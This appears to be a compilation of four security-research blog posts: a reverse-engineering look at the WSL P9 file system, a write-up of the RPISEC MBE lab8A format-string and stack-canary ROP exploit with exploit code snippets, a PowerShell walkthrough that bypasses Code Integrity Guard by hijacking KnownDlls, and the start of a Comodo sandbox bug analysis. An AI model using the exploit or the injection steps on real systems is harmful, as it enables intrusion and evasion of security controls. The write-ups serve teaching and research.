
Digging into the WSL P9 File System

By: Unknown
12 July 2019 at 15:23
Windows 10 version 1903 is upon us, which gives me a good reason to go looking at what new features have been added that I can find bugs in. As it's clear people seem to appreciate fluff rather than in-depth technical analysis I thought I'd provide an overview of the process I undertook to look at one new feature, the P9 file system added for the Windows Subsystem for Linux (WSL). The aim is to show my approach to analyzing a feature with the minimum amount of reverse engineering, ideally with no disassembly.

Background

When WSL was first introduced it had a pretty poor story for interoperability between the Linux instance and the host Windows environment. In the early versions the only, officially supported, way to interop was through DrvFS which allows you to mount local Windows drives into the Linux environment. This story has changed over time with additions such as support for starting Windows executables from Linux and better NTFS case-sensitivity support (which I blogged about already).

But one fairly large pain point remained, accessing Linux files from Windows applications. You could do it, the files are stored inside the distro's package directory (%LOCALAPPDATA%\Packages\DISTRO\LocalState\rootfs), so you could open them directly. However WSL relies on various tricks to deal with the mismatch between Windows and Unix-style filesystem semantics, such as storing the UID/GID and file permission bits in extended attributes. Modifying these files using an unenlightened Windows application could result in corruption of the file state which in the worst case could break the distro.

With the release of 1903 the WSL team (if such a thing exists) looks to be trying to solve this problem once and for all. This blog introduced the new feature, accessing Linux files via a UNC path. I felt this warranted at least a small amount of investigation to see how it works and whether there are any quick wins or low-hanging fruit.

Understanding the Feature

The first thing I needed was to set up an x64 version of 1903 in a Hyper-V VM. I then made the following changes, which I would always do regardless of what I end up using the VM for:
  • Disabled SecureBoot for the VM.
  • Enabled kernel debugging through BCDEDIT. Note that I tend to be paranoid enough to disable NICs in the VM (and my success in setting up alternative debug transports is mixed) so I resort to serial debugging over a named pipe. Note that for Gen 2 Hyper-V VMs you can't add a serial port from the UI, instead you need to use the Set-VMComPort PowerShell cmdlet.
  • Installed my tooling, such as NtObjectManager and the Sysinternals suite, especially Process Monitor.
  • Enabled the Windows Subsystem for Linux feature.
  • Installed a distro of choice from the Windows Store. Debian is the most lightweight, but any will do for our purposes. Note that you don't need to log in to the Store to get the distro, though the app will do its best to convince you otherwise. Don't listen to its lies.
With a VM in hand we can now start the investigation. The first thing I do is take any official information at face value and use that to narrow the scope. For example reading the official blog post I could determine the following:
  • The feature uses the Plan 9 Filesystem Protocol to access files.
  • The files are accessed via the UNC path \\WSL$\DISTRO but only when the distro is running.
  • The P9 server is hosted in the init process when the distro starts.
  • The P9 server uses UNIX sockets for communication.
Based on those observations the first thing I want to do is try and find how the UNC path is implemented. The rationale for starting at the UNC path is simple, that's the only externally observable feature described in the blog post. Everything else, such as the use of P9 or UNIX sockets could be incorrect. I'm not expecting the blog post to outright lie about the implementation, but there are sometimes more important details to get right than others. It's worth noting here that you should increase your skepticism of a feature's technical description the older the blog post is as things can and will change.

If we can find how the UNC path is implemented that should also lead us to whether P9 is used as well as what transport the feature is using. An important question is whether these files are really accessed via the UNC path, which would imply kernel support, or is it only in Explorer? This is important to allow us to track down where the implementation lies. For example it's possible that if the feature only works in Explorer it could be implemented as a shell extension, similar to how MTP/PTP is supported.

To determine whether it's a kernel driver or a shell extension it's as simple as opening the UNC path using the lowest possible function, which in this case means calling a system call. Invoking a system call will also eliminate the chance the WSL UNC path is implemented using some new feature added to the Win32 APIs. As my NtObjectManager module directly calls the NtOpenFile system call we can use that to do the test. I ran the following PowerShell command to check on the result:

$f = Get-NtFile \??\UNC\wsl$\Debian\bin\bash

This command successfully opens the BASH executable file. This is a clear indication that we now need to look at the kernel to find the driver responsible for implementing the UNC path. This is commonly implemented by writing a Network Mini-Redirector which handles a lot of the setup with the Multiple UNC Provider (MUP) and the IO Manager.

At this point the assumption would be that the mini-redirector is implemented in the LXCORE system driver which implements the rest of WSL. However a quick check of the imports with the DUMPBIN tool shows the driver doesn't import anything from RDBSS, which would be crucial for the implementation of a mini-redirector.

To find the actual driver name I'll go for the simplest, brute force approach, just list all drivers which import RDBSS and see if any are obvious candidates based on name. You could achieve this in one of many ways, for example you could implement a PE file parser and check the imports, you could script DUMPBIN, or you could just GREP (well FINDSTR) for RDBSS, which is what I'll do. I ran the following:

c:\> findstr /I /M rdbss c:\windows\system32\drivers\*.sys
c:\windows\system32\drivers\csc.sys
c:\windows\system32\drivers\mrxdav.sys
c:\windows\system32\drivers\mrxsmb.sys
c:\windows\system32\drivers\mrxsmb20.sys
c:\windows\system32\drivers\p9rdr.sys
c:\windows\system32\drivers\rdbss.sys
c:\windows\system32\drivers\rdpdr.sys

In the FINDSTR command I just list all drivers which contain the case insensitive string RDBSS and print out the filename only (unless you enjoy terminal beeps). The result of this process is a clear candidate P9RDR. This also likely confirms the use of the P9 protocol, though of course we should never jump the gun on this. 
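If you'd rather script the check than grep, here's a minimal sketch of the PE-parsing alternative mentioned above, using the third-party Python pefile module (the module choice and output format are mine, not part of the original process):

import glob
import pefile

# Walk every driver's import table and report anything importing from RDBSS,
# mirroring what the FINDSTR one-liner approximates with a raw string search.
for path in glob.glob(r"c:\windows\system32\drivers\*.sys"):
    try:
        pe = pefile.PE(path, fast_load=True)
        pe.parse_data_directories(
            directories=[pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_IMPORT"]])
        dlls = [imp.dll.decode().lower() for imp in getattr(pe, "DIRECTORY_ENTRY_IMPORT", [])]
        if any("rdbss" in dll for dll in dlls):
            print(path)
    except pefile.PEFormatError:
        pass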

We could throw the driver into a disassembler at this point and start RE, but I don't want to go there just yet. Instead, in the spirit of laziness I'll throw the driver into STRINGS and get out all printable debug string information, of which there's likely to be some. I typically use the Sysinternals STRINGS rather than the BINUTILS one, as I usually have it installed on any test system and it handles Unicode and ANSI strings with no additional arguments. Below is some of the output from the tool:

c:\> strings c:\Windows\system32\drivers\p9rdr.sys
...
\Device\P9Rdr
P9: Invalid buffer for P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid AF_UNIX path in P9RDR_ADD_CONNECTION_TARGET_INPUT.
P9: Invalid share name in P9RDR_REMOVE_CONNECTION_TARGET_INPUT.
...
\wsl$

We can see a few things here. Firstly, there's the WSL$ prefix, which is a good indication that we're in the right place. Second, we can see a device name, which gives us a good indication that there's expected to be communication from user mode to kernel mode to configure the device. And finally we can see the string "AF_UNIX" which ties in nicely with our expectation that Unix sockets are being used.

One thing which is missing from the STRINGS output is any indication of the Unix socket file name being used. Unix sockets can be used in an "abstract" fashion, however typically you access the socket through a file path on disk. It's most likely that the driver communicates with the socket through a file (I don't even know if Windows supports the "abstract" socket names), and therefore, if a file is indeed being used, it doesn't have a fixed filename. The kernel has support for a socket library so again maybe this would be the place we could go disassembling, but instead we'll just do some dynamic analysis using PROCMON.

In order to open a socket from a file there must be some attempt to call the IO Manager to open it, this in turn would likely be detectable using PROCMON's filter driver. We can therefore make the following assumptions:

  • The file open can be detected in PROCMON.
  • The socket file will be opened in the context of the first process to open the UNC path.
  • The open request will have the P9RDR driver on the call stack.
The first assumption is a general problem with PROCMON. There are ways of opening files, such as inside another filter driver, which cannot be detected by PROCMON as it never receives the request. However we'll assume that it can be detected, and of course if we don't find it we might have to resort to disassembly or kernel debugging after all.

The second assumption is based on the fact the WSL distribution isn't always running, therefore any Unix socket file would only be opened on demand, and for reasons of laziness is likely to be in the same process that first makes the request. It could push the request to a background thread, but it seems unlikely. By making this assumption we can filter PROCMON to only show open file requests from a known process.

The final assumption is there to filter down all possible open file requests to the ones we care about. As the driver is a mini-redirector the call chain is likely to be IO Manager to MUP to RDBSS to P9RDR to UNIX SOCKET. Therefore we only care about anything which goes through the driver of interest. This assumption is more important if assumption 2 is false as it might mean that we couldn't filter to a specific process, but we'll go with it anyway on the basis that it's a useful technique to learn.

Based on the assumptions we can set PROCMON's filters for a specific process (we'll use PowerShell again) and filter for all CreateFile operations. The Windows kernel doesn't specifically differentiate between open and create calls (open is a specific case of create) so PROCMON doesn't either.

PROCMON Filter View showing filtering on powershell process name and CreateFile operation.

What about the call stack? As far as I can tell you can't filter on the call stack directly, instead we'll do something else. But first gather a trace of a PowerShell session where you execute the Get-NtFile command shown earlier in this blog post. Now we want to save the trace as an XML file. Why an XML file? First, the XML format is easy to access, unlike the native PML format. However, the real answer is shown in the following screenshot.

PROCMON Save Dialog showing options for XML output including stack traces.

The screenshot shows the options for exporting to XML. It allows us to save the call stacks for all trace events. It will even resolve symbols, however as we're only interested in the module on the stack not the name we can select to include the stack trace, but not symbol resolving. With an exported trace we can now filter the calls using a simple XPath expression. The following is a simple PowerShell script to run the XPath query.

$xml = [xml]$(Get-Content "LogFile.XML")
$xml.SelectNodes("//event[stack/frame[contains(path, 'p9rdr')]]/Path[text()]")

The script is pretty simple, if you "cast" a text file to an XML object (using [xml]) PowerShell will create an XML DOM Document from the text. With the Document object we can now call SelectNodes with an appropriate XPath. In this case we just want to select the Path of all events which have a stack trace frame containing the P9RDR module. Running this script against the capture results in one hit:

%LOCALAPPDATA%\Packages\DISTRO\LocalState\fsserver

DISTRO is the name of the Store package you installed the distro from, for example Debian is installed into TheDebianProject.DebianGNULinux_76v4gfsz19hv4. With a file name of fsserver it seems pretty clear what the file is for, but just to check let's open the event back in PROCMON and look at the call stack.

PROCMON call stack opening fsserver showing AFUNIX driver and P9RDR.

I've highlighted areas of interest, at the top there's the calls through the AFUNIX driver, which demonstrates that the file is being opened due to a UNIX socket connection being made. At the bottom we can see a list of calls in the P9RDR driver. As symbol resolving is enabled we can use the symbol information to target specific areas of the driver for reverse engineering. Also now we know the path we can put this back into PROCMON as a filter and from that we can confirm that it's the init process which is responsible for setting up the file server.

In conclusion we can at least confirm a few things which we didn't know before.
  • The handling of the UNC paths is handled entirely in kernel mode via a mini-redirector. This makes the file system more interesting from a security perspective as it's parsing arbitrary user data in the kernel.
  • The file system uses UNIX sockets for communication, this is handled by the kernel driver and the main init process.
  • The socket protocol is presumably P9 based on the driver name, however we've not actually confirmed that to be true.
There's of course still things we'd want to know:
  • How are the UNC mappings configured? Via the device driver?
  • Is the protocol actually P9, and if so what information is being passed across?
  • How well "fuzzed" are the protocol parsers?
  • Does this file system have any other interesting behaviors?
Some of those things will have to wait for another blog post.









Stack-canary (ROP), format string leak plus how I learned that nullbyte is not a badchar to scanf("%s",buf) - while socat ignores read on STDIN - MBE LAB8A

28 July 2019 at 14:28

This time we are having some fun with a standard null-armored stack canary, as well as  an additional custom one (we will extensively cover both scenarios, as there's plenty of subject matter here), plus some peculiarities regarding scanf() and read().

The relevant MBE lecture can be found here http://security.cs.rpi.edu/courses/binexp-spring2015/lectures/19/11_lecture.pdf (the last section covers stack canary implementations and possible bypasses, as well as resources on deeper research).

A look at the target app, its vulns and its custom stack cookie protection

As usual, the target app can be found here - https://github.com/RPISEC/MBE/blob/master/src/lab08/lab8A.c.

Here are the compilation flags; static and no PIE - although the latter does not matter much in this case - we will leak the code segment base anyway:

Let's start with the main function:

We have two functions that are always called from the main function one after another, regardless of any user input: selectABook() and findSomeWords().

selectABook() looks like this:

Apart from its (and the entire app's, for that matter) general weirdness, we can see that:

  1. the function calls itself recursively (line 29) when user input does not match any of the hardcoded conditions
  2. it's vulnerable to a stack-based buffer overflow via scanf("%s",buf_secure) - line 16
  3. it's also vulnerable to format string (line 17)

readA(), readB() and readC() are just simple methods printing out static hardcoded strings (Aristotle's Metaphysics quotes), nothing useful in the context of exploitation (unless we had printf() GOT overwritten, but that is not what's going to happen here):

So at this point it already looked like I had what was needed to pwn the app; two bugs to chain together:

  • an overflow to overwrite the saved RET on the stack
  • a format string to leak the value of the stack canary (and the stack and code base if necessary) - so we can overwrite the stack canary with its own original value, keeping the stack guard from noticing we smashed the stack and from preventing the program from returning to our arbitrary EIP

Leaking the standard canary with format string

Let's start with identifying what the actual built-in code for handling stack canaries looks like in gcc-produced assembly:

the beginning of the main() function
the bottom of the main() function

The same holds true for all other functions.

Now, let's see what the stack values look like between runs and how exactly stuff is aligned on the stack. As we want to leak from selectABook()'s stack - because this is where the format string resides - let's put our breakpoints there:

Let's stop at selectABook+15 - our current canary will be held in EAX.

Then at selectABook+42 - after the scanf() call - we'll fill the buf[512] with exactly 512 bytes so we don't overflow anything yet and see the original values on the stack.

So we run:

breakpoint 1 - canary value is held in EAX

OK, now let's continue. Now (we have already been prompted above - Enter Your Favorite Author's Last Name:), we just paste 512 characters:

OK, we're past the scanf() call. Let's see the stack now:

... snip ...

The format string we are exploiting is a simple printf(buf_secure). buf_secure[512] is 512 bytes long. If we apply the abuser-friendly format string %p (so the whole dword of choice is printed as hex) - just like we did here https://hackingiscool.pl/heap-overflow-with-stack-pivoting-format-string-leaking-first-stage-rop-ing-to-shellcode-after-making-it-executable-on-the-heap-on-a-statically-linked-binary-mbe-lab7a/ - considering that 512/4 = 128, we would expect our canary at %129$p.

Nah, something's wrong. Maybe it's because format strings index the `$`-referred arguments starting at 1... Let's see what's under %1$p:

Nah, it's the buf_secure address itself.

How about 130?

Yeah more like it.

The value is consistent between function calls (selectABook() as well as the recursive selectABook()->selectABook() call - remember, the stack canary value is global to the entire process) and it changes between runs.

Also, in this case the saved EBP should be right next to it, at 131:

Consecutive values of saved EBP across recurrent selectABook() calls

Yup. The consecutive values are decreasing by a fixed offset as recursive calls of selectABook() continue.

We will need this value as well while developing the exploit for this.
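As a sanity check, here's a minimal pwntools-style sketch of just this leak step (the prompt text is assumed, the binary path is the one used later in the write-up, and offsets 130/131 are the ones found above):

from pwn import *

# Hedged sketch of the leak only, not the full exploit.
p = process("/levels/lab08/lab8A")
p.recvuntil(b"Last Name:")                      # prompt text assumed
p.sendline(b"%130$p.%131$p.")                   # printf(buf_secure) echoes canary and saved EBP
p.recvuntil(b"0x")
canary = int(b"0x" + p.recvuntil(b".", drop=True), 16)
saved_ebp = int(p.recvuntil(b".", drop=True), 16)
log.info("canary:    %#x" % canary)
log.info("saved EBP: %#x" % saved_ebp)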

As a matter of fact at this point I even wrote the first version of the exploit (https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8A/wannabe_initial_exploit.py).

As usual - the exploit failed at the first attempt...

And I was too lazy to actually debug it.

Instead, once I noticed that the saved RET was not overwritten as a result of overflowing the buffer, I mistakenly assumed (self-limiting assumptions!) that the nullbyte-armoured stack canary (you probably already noticed that all the canaries so far had a nullbyte as their least-significant byte) was the reason I could not - via scanf("%s",buf_secure) - write beyond the nullbyte. I just thought scanf() would stop reading after encountering 0x0 on its input, explicitly because of the %s format string. I was wrong, but this assumption was reinforced by the fact that oftentimes while figuring out solutions to MBE targets I felt like it was all fine and dandy... only to later realize there was some tiny little obstacle. A tiny little obstacle forcing me to double the overall effort to attain a working exploit. Thus I assumed selectABook() exploitability was too good (too easy) to be true.

To follow the selectABook() exploitation route, skip to Building the ROP chain and then to Successfully exploiting selectABook() locally and remotely sections.

Otherwise, read on to explore the remainder of the target app and my exploit dev process.

Analyzing the rest of the code

We have only read half of the source code so far (as mentioned, this is an extensive write up)!

So, to feed our curiosity, instead of getting ahead of ourselves, let's see what's going on in the second function - findSomeWords():

The stack-based buffer overflow of the 24-byte buf[24] buffer with read(STDIN, buf,2048) at line 75 is quite blatant.

The rest of the code is just super-weird. First, the unused char lolz[4], then the entire custom cookie mechanism.

Bypassing the custom canary check

So let's try to figure out what's the deal with it.

global_addr and global_addr_check are global pointers held in the data segment, declared at the top of the source code, right below the compilation flags comment:

Although their initialization expressions are quite simple, I found them far from obvious:

So apparently global_addr is a pointer to the next value after the buf (I initially thought it's just the address of the buf buffer incremented by 1, but I was wrong).

Then global_addr_check is the global_addr (whatever it is) decremented by 2.

And then finally there's this check:

The implication is as follows: if we want to exploit the stack-based buffer overflow in findSomeWords(), we need the function to properly return, without the exit(EXIT_FAILURE) nor the standard stack guard interrupting.

So in order to make it return, we need to both:

  • overwrite the original stack canary stored on the stack with its own value that we leak earlier via the format string in selectABook() (there is just one stack canary value for the entire program, initialized before main() is executed and used by the stack guard for all following function calls)
  • make the ((*global_addr) ^ (*global_addr_check)) != ((*global_addr) ^ 0xdeadbeef) condition evaluate to false so exit(EXIT_FAILURE) is not called

Let's simplify the custom-cookie condition.

We want this:

to evaluate false.

Which means we want this to be true:

Which means the value global_addr_check points to must equal 0xdeadbeef.

OK fair enough, does this mean that the custom cookie protection by default makes the program exit with EXIT_FAILURE error code and Whoah there! message?

Yes, it does - simply running the app and providing "A" and "HELLO" inputs, respectively, results in this:

Fair enough. Let's bypass this custom canary, forgetting about the format string and overflows for now.

Let's make this app print out Whew you made it! instead of doing exit(EXIT_FAILURE) in findSomeWords():

As my poor understanding of C kept me unsure about the mechanism, I got to the bottom of this by running gdb, disassembling the findSomeWords() function, setting up a breakpoint after the read() call and stepping through it, instruction after instruction.

OK, breakpoints:

Debugging step by step.

1)  findSomeWords+80:

At this point EAX is 0xbffff700 --> 0xc43c9300  - the address of the canary on the local function's stack.

2) findSomeWords+87:

At this point EAX is still 0xbffff700 --> 0xc43c9300, EDX is 0xc43c9300 (canary from the stack). So now we have proof that the global_addr = (&buf+0x1); instruction makes the global_addr pointer point at the canary on the stack.

And now we are about to find out what's under ds:0x80edf24 (the value just gets copied to EAX).

3) findSomeWords+92:

And now EAX is 0x080481a8... weird. Let's peek at the stack and see what's what:

OK, so global_addr points at the canary on the stack, while global_addr_check points at the value two dwords (-0x8) earlier. But hang on, where did this 0x080481a8 value come from?

The reason is that we did not fill the entire buf[24] buffer (I only sent 11 Bs at that time). Here's how the buf[24] overlaps with global_addr_check:

This means that:

global_addr points at the stack-stored copy of the canary

global_addr_check points at the before-last dword of buf[24]. So the (&buf+0x1); expression took the buf size into account, making global_addr point at the next dword on the stack (the canary), while global_addr_check = global_addr-0x2; made global_addr_check point two dwords earlier, at the four bytes buf[16-19].

In recap: the stack-stored canary XOR-ed with 0xdeadbeef must equal the stack-stored canary XOR-ed with the before-last dword of buf. Which simply means we just want the before-last dword of buf[24] (again, bytes 16-19) to be 0xdeadbeef.

So as long as the value we provide to the read(STDIN,buf,2048) call in findSomeWords() contains 0xdeadbeef at its fifth dword (bytes 16-19), we should bypass the custom stack protection:

https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8A/custom_canary_bypass.py
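For reference, a minimal sketch of the payload shape derived above (not necessarily byte-for-byte what the linked script sends):

from pwn import *

# Dword 5 of buf[24] (bytes 16-19) is what *global_addr_check ends up reading,
# so it must hold 0xdeadbeef; everything else in the 24 bytes is filler.
payload  = b"A" * 16             # bytes 0-15: filler
payload += p32(0xdeadbeef)       # bytes 16-19: value compared against the canary XOR
payload += b"B" * 4              # bytes 20-23: rest of buf[24], canary left untouched
# fed to the read(STDIN, buf, 2048) call once selectABook() has been satisfied with "A"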

Yup, that's exactly it:

OK cool, now we should be able to easily exploit the overflow in findSomeWords().

Building the ROP chain

Since we don't have libc dynamically linked in here, we can't do system().

Fine, we just want to call execve syscall the usual way:

eax = 0xb

ebx = pointer to "/bin/sh" - or, for that matter, "/bin/python" or anything other than "/bin/bash" (because bash is evil and drops the euid if called from a suid binary - fucking safety features)

ecx = edx = 0

int 0x80

Let's start ROPeme ropshell.py, generate the gadgets from the target binary and search through them.

Spoiler alert: at the late stage of the exploit development process I realized that - when targeting the scanf("%s") overflow - characters 0xa (newline) and 0xd (carriage-return) have to be avoided - as opposed to 0x0 (yes, really).

Thus, some of the gadgets I initially used had to be replaced due to the fact their addresses contained either 0xa or 0xd.

Running ROPeme, generating the gadgets:

Loading the gadgets:

Searching the gadgets (let's start with xor anything anything):

OK, all the last three look good for starters, we can initiate EAX with 0.

By the way, please keep in mind I started building this one with the assumption I could not use nullbytes in the payload, so instead of just putting a pop eax address followed by a nullbyte, I kept assembling these workarounds - but it was fun and finally worked.

So - as there was no xor edx edx (effectively EDX=0) gadget, I followed one of the tips found here (https://trustfoundry.net/basic-rop-techniques-and-tricks/) to use xchg instead (as we have already put 0 to EAX):

Just keep in mind that now EAX holds whatever garbage was in EDX, so we'll have to zero it again, with one of the xor eax eax gadgets.

Oh fuck, we can't use them. They all contain 0xa.

Fair enough.

Instead, we use the gadget putting 0xffffffff to EDX followed by inc edx to overflow it to 0:

Now, we want EAX to become 0xb. It's 0 at the moment.

So why not to call inc eax twelve times.

My meticulous effort to keep the chain clean from nullbytes finally collapsed when I had to nullify ecx. Instead of pop ecx followed by a nullbyte I did this:

Which looks nicer but still does not change the fact that p32(0x1) = 0x00000001 - contains three nullbytes.

Then, EBX = address of "/bin/sh" (we will smuggle /bin/sh string to the stack in user input, then just calculate its address based on the leaked EBP value):

OK, one last thing, the int 0x80 call.

But wait, it has a nullbyte (I did not want nullbytes!).

OK, so what's the instruction right above it?

It's a NOP. Wonderful. So we can as well use 0x806f8ff.

Successfully exploiting findSomeWords() locally - read(STDIN,buf,2048) not catching up via socat

Having all the bits and pieces I assembled an exploit targeting the findSomeWords() overflow, with the following algorithm:

1) leak the canary and the saved RET via format string

2) make the selectABook() function return by providing one of the expected values ("A") to its input

3) overflow the buf[24] buffer via read(STDIN, buf, 2048), using the leaked canary as well as the 0xdeadbeef constant properly aligned in the payload, followed by four bytes of garbage to fill the saved EBP and the ROP chain beginning where saved RET was:

https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8A/exploit_works_only_locally.py

And it worked just fine on the target binary /levels/lab08/lab8A, getting me a shell... The problem was that my privileges were still lab8A instead of the expected lab8end... So I listed the /levels/lab08 directory only to find out that this one is NOT a suid binary.

Instead I found this:

This means the target is being run from root like this:

socat TCP-LISTEN:8841,reuseaddr,fork,su=lab8end EXEC:timeout 60 /levels/lab08/lab8A

"Well that's just as well" - I thought. And just changed the p = process(binary.path,stdin=PTY) line to p = remote("127.0.0.1", 8841) and ran the thing.

It did not work.

Debugging (this time attaching to the target PID from root, as there was no other way) revealed that the exact same exploit code did not deliver a single byte to the buf[24] buffer.

So I thought "how come, ffs... Does it mean it completely ignores the user input?".

So I ran it manually to see if that was the case:

Interacting with the socat-run target app via nc

So yes, I could only interact with the selectABook() function. Simply typed "A" and pressed enter, having no further opportunity to interact with the application.

At the moment I still do not know why - please let me know if you have a clue, I am curious.

Successfully exploiting selectABook() locally and remotely

At this point, as usual when I felt despair - I peeked into Corb3nik's solutions (https://github.com/Corb3nik/MBE-Solutions/blob/master/lab8a/solution.py) - not only to see that his exploit did not deal with findSomeWords() and its custom stack canary at all - but mostly to realize he exploited selectABook() (which meant scanf("%s")) ... with nullbytes in the payload!

So I fell back on the first exploit I wrote and started debugging it again. I found out the reason it was failing was due to 0xa and 0xd characters in the initial ROP chain. These turned out to be the real bad characters when it comes to scanf()! Again, as opposed to the nullbyte.

Then I found out that the string I was trying to make EBX point to (/bin/python - I had found that string on the stack in the early stage of exploit development and thought it would be nice to use it instead of delivering /bin/sh via user input) was not there when targeting the actual app running under socat... It must have been a side effect of spawning the process from the python script with pwntools while developing the exploit.

Then it turned out my lengthy ROP chain (overflowing the local buf_secure of the selectABook()->selectABook() call) overwrote the /bin/sh value I delivered to the stack right after the initial format-string payload (the first call of selectABook()).

So I ended up adding an additional 200 characters (H) between the format string and /bin/sh and increasing the value subtracted from the leaked EBP in the binsh_addr = EBP_value - 338 expression accordingly.

1) Attacking the first selectABook() call to leak the canary and the saved EBP via format string while also stuffing /bin/sh on the stack - with 200 H-s in between, as this buffer will get overwritten by the ROP chain when we overflow the buffer in the second (recursive) call selectABook()->selectABook():

2) Attacking the second call selectABook()->selectABook() by overflowing the buf_secure[512] with 512 B-s followed by the original leaked canary value, the original saved EBP value (although this value does not matter here as long as it is not a bad char) and the 0xa-free and 0xd-free ROP chain replacing the saved RET:

3) Making the third selectABook()->selectABook()->selectABook() call return (instead of recursing further) by providing one of the expected values - A:
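Putting the three stages together, here is a consolidated sketch of the flow (prompt strings, the ROP chain contents and the exact padding are assumptions taken from the description above; the author's working script is linked below):

from pwn import *

p = remote("127.0.0.1", 8841)                   # the socat listener

# Stage 1: leak canary + saved EBP, park "/bin/sh" on the stack behind 200 bytes of padding.
p.recvuntil(b"Last Name:")
p.sendline(b"%130$p.%131$p." + b"H" * 200 + b"/bin/sh\x00")
p.recvuntil(b"0x")
canary = int(b"0x" + p.recvuntil(b".", drop=True), 16)
saved_ebp = int(p.recvuntil(b".", drop=True), 16)
binsh_addr = saved_ebp - 338                    # offset quoted above, may need adjusting
                                                # (feeds the pop ebx link of the chain)

# Stage 2: overflow buf_secure in the recursive selectABook() call.
rop_chain = b"..."                              # placeholder for the 0xa/0xd-free gadget chain
p.recvuntil(b"Last Name:")
p.sendline(b"B" * 512 + p32(canary) + p32(saved_ebp) + rop_chain)

# Stage 3: make the innermost call return instead of recursing again.
p.recvuntil(b"Last Name:")
p.sendline(b"A")
p.interactive()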

Getting the flag

The final code can be found here:

https://github.com/ewilded/MBE-snippets/blob/master/LAB8/LAB8A/exploit_working.py

Windows Code Injection: Bypassing CIG Through KnownDlls

By: tiraniddo
11 August 2019 at 00:20
TL;DR; This blog post describes a technique to inject a DLL into a process using only Duplicate Handle process access (caveats apply) which will also bypass Code Integrity Guard.

I've been attending Blackhat USA 2019 and watched a presentation by Amit Klein and Itzik Kotler on Windows Process Injection techniques. While I didn't learn anything new from the presentation that you couldn't from just reading Hexacorn's blog it was interesting to see them document what techniques worked against Code Integrity Guard (CIG) and what did not. CIG, if you don't know, is Microsoft's term for blocking non-MS signed DLLs from being loaded into a process. If CIG is enabled on a process then you can't load an arbitrary DLL not signed by Microsoft; instead you'll have to do some sort of shellcode or ROP.

During the presentation I was waiting for the punchline of a technique which bypasses CIG to load an arbitrary DLL, but it never arrived. I'm guessing the researchers don't bother to read my blog posts *sigh*, such as this one on injecting code into Protected Processes through abusing the KnownDll mechanism. This would also work to bypass CIG if injecting from an external process not under CIG (or Device Guard). All the ways of hijacking the Known DLL loader that I've documented rely on knowing the location of the Known DLLs handle in NTDLL's data section. That's useful when you have little control over the target process and only an arbitrary read/write primitive. For user-mode code injection you're likely to be able to do anything to the process.

Writing a new handle value does have drawbacks if you're thinking about it from a generic code injection perspective. Firstly the location of the handle can (and does) change depending on the version of NTDLL and secondly if you access and write memory of another process you might as well call your binary malware.exe. Of course writing to memory is not the only way to hijack Known DLLs, you can achieve the same thing with only Duplicate Handle access on the process, which is probably slightly less suspicious.

How can we do this without modifying the handle value? There are 3 key observations we can make that only require Duplicate Handle access:
  1. We can find the existing handle value of the KnownDlls directory by duplicating handles from the target process into our own and querying for the name.
  2. We can close a handle in another process by specifying DUPLICATE_CLOSE_SOURCE to DuplicateHandle.
  3. The kernel's handle allocator will reuse the handle values so we can replace the original handle with a different object through brute force.
Let's go through how this works in practice. I'm going to show some snippets of PowerShell which use my NtObjectManager module. I'm not going to provide a full end-to-end proof-of-concept however for various reasons.

Step 1: Bring up a process to inject into, the Known DLLs handle is created during the initial loader process before the process entry point is called, so the process must run at least that long. Once we know the Process ID of the process to inject into we can dump all handles in the process and look for anything with the NT type of Directory. Each directory handle can then be duplicated into the current process and inspected. If the name of the directory is "\KnownDlls" we've found our target. In PowerShell we can use my Get-NtHandle cmdlet to dump the handle table, this doesn't require opening the process itself. To get the name we only need PROCESS_DUP_HANDLE access to the target. Here's a basic PS function to get the handle value:

$id = $(Get-Process notepad).Id
$hs = Get-NtHandle -ProcessId $id -ObjectTypes Directory
foreach($h in $hs) {
  if ($h.Name -eq '\KnownDlls') {
    $handle = $h.Handle
    break
  }
}

Step 2: Create an empty object directory and insert into it a named image section object. The name of the section needs to match the name of the system32 DLL we want to hijack. The file backing the section is obviously the DLL you want loaded into the process. Again some code, assuming you've already created the directory:

$dir = New-NtDirectory
$sect = Use-NtObject($f = Get-NtFile -Path "\??\c:\dir\fake.dll") {
        New-NtSection -File $f -SectionAttributes Image `
          -Root $dir -Path "blah.dll" -Protection Execute
    }

Step 3: Close the original Known DLLs handle. Again this only needs Duplicate Handle access. At this point you probably also want to suspend the process to ensure something doesn't execute and allocate the handle over the top of your now closed handle. Of course if you suspend the process you'll need a bit more access.

$proc = Get-NtProcess -ProcessId $id -Access DupHandle
Copy-NtObject -SourceHandle $handle -SourceProcess $proc `
                                    -CloseSource

Step 4: Repeatedly duplicate the fake Known DLLs directory you created in step 2 until you get the same handle value as you identified in step 1. If the process is suspended this shouldn't take more than a few tries at worst.

$i = 0
while($i -lt 1000) {
   $h = Copy-NtObject -DestinationProcess $proc -Object $dir
   if ($h -eq $Handle) {
       break
   }
   $i++
}

Step 5: Everything is now set up. The final step is you'll need to get a new library loaded from system32 inside the process. There's a number of possible techniques for this. You could go old-skool and create a new thread in the process calling LoadLibrary. Or you could identify a DLL which you know the process will load in response to a UI or RPC action. For example opening a file in Notepad will spawn the explorer open dialog which pulls in a lot of new DLLs. Be creative, at least if you don't want to open the process with anything above Duplicate Handle access.


The question you might be asking is, "Do any AV/Host Detection tools catch this trick?". Honestly I don't know, nor do I care. However it has some things going for it:

  • It doesn't require reading or writing memory of the target process.
  • Inline hooks on LoadLibrary/LdrLoadDll will just see loading a system32 DLL unless they also then query for the mapped file name after the operation has completed.
  • It bypasses CIG, so anyone thinking that'll prevent injection will be surprised.
You could probably make it even more covert, but I'm not going to do so. As I've noted before I'm also not going to write a proof-of-concept or write a tool to do this, you can do it yourself.












Comodo Antivirus - Sandbox Race Condition Use-After-Free (CVE-2019-14694)

13 August 2019 at 16:14
Hello,
In this blogpost I'm going to share an analysis of a recent finding in yet another Antivirus, this time in Comodo AV. After reading this awesome research by Tenable, I decided to give it a look myself and play a bit with the sandbox.

I ended up finding a vulnerability by accident in the kernel-mode part of the sandbox implemented in the minifilter driver cmdguard.sys. Although the impact is just a BSOD (Blue Screen of Death), I have found the vulnerability quite interesting and worthy of a write-up.

Comodo's sandbox filters file I/O allowing contained processes to read from the volume normally but redirects all writes to '\VTRoot\HarddiskVolume#\' located at the root of the volume on which Windows is installed.

For each file or directory opened (IRP_MJ_CREATE) by a contained process, the preoperation callback allocates an internal structure where multiple fields are initialized.

